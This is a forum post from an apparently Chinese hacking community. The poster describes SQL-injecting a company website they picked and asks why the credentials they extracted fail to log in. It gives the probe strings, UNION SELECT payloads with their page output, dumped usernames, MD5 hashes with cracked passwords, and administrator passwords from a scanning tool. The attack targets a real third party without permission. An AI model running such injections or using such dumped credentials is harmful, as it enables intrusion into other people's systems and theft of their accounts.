- 帖子
- 310
- 积分
- 810
- 威望
- 1302
- 金钱
- 1010
- 在线时间
- 2 小时
|
[讨论]关于手动注入的问题 请高手来帮忙解决下
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
议题作者:哈破boy
这是关于SQL手动注入的一个问题
今天晚上, 我找了一个企业网站,通过命令and 1=1 和 and 1=2 发现了有注入漏洞
相继猜出字段数目是15,有两个表名 分别是 user 和 manage_User
可是,问题出在 在我猜用户和密码的时候 返回的用户:BlueM MD5密码是:49ba59abbe56e057 经解密:123456
在后台登陆时,密码错误. 前台登陆一样密码错误!
后来我用DOMIAN3.5来试了下 扫出user下有两个用户名 一个用户名是BlueM 对应MD5密码是:b51a468e87e07820 经解密:369258
另一个用户名是:xiaoyang 对应MD5密码是:49ba59abbe56e057 经解密:123456
manage_user下也有两个用户名: 一个用户名是:admin 密码是:2;;588<< 另一个用户是f77465g 密码是:586:,>erd
我用user下的两个用户登陆后台 提示帐户不存在或者密码错误, 在前台登陆帐户密码对了...我发现手动猜USER的时候密码用户怎么显示BlueM 而加密的密码是xiaoyang这个帐户的加密密码???
这是问题1
命令是: and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from user (回车)
and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%user (页面显示正常,页面显示 3>>4>>6)
and%201=2%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15%20from%user (页面显示:3>>49ba59abbe56e057>>6)
and%201=2%20union%20select%201,2,3,username,5,6,7,8,9,10,11,12,13,14,15%20from%user (页面显示:3>>BlueM>>6)
为什么会出现这种情况??? 麻烦高手解答下
当用manage_user下的两个用户登陆后台时: 提示帐户不存在或者密码错误, 在前台登陆时也一样提示帐户不存在或者密码错误!为什么会这样?这是问题2
小弟先在这真心的感谢下回帖的人.永远为爱自己活者
帖子6 精华0 积分23 阅读权限40 性别男 在线时间9 小时 注册时间2007-12-24 最后登录2008-6-17 查看详细资料TOP 您知道您年薪应是多少?
沉渊
晶莹剔透§烈日灼然 |
|